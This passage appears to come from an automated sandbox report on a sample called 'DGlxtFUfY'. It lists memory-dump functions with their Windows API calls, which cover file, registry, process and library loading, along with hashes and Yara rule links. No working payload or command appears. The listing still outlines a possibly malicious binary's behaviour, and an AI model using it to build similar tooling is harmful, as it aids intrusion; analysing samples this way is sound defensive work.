                                                                                                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004301AD
                                                                                                                                                • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1297977491-0
                                                                                                                                                • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859505661-0
                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Open
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
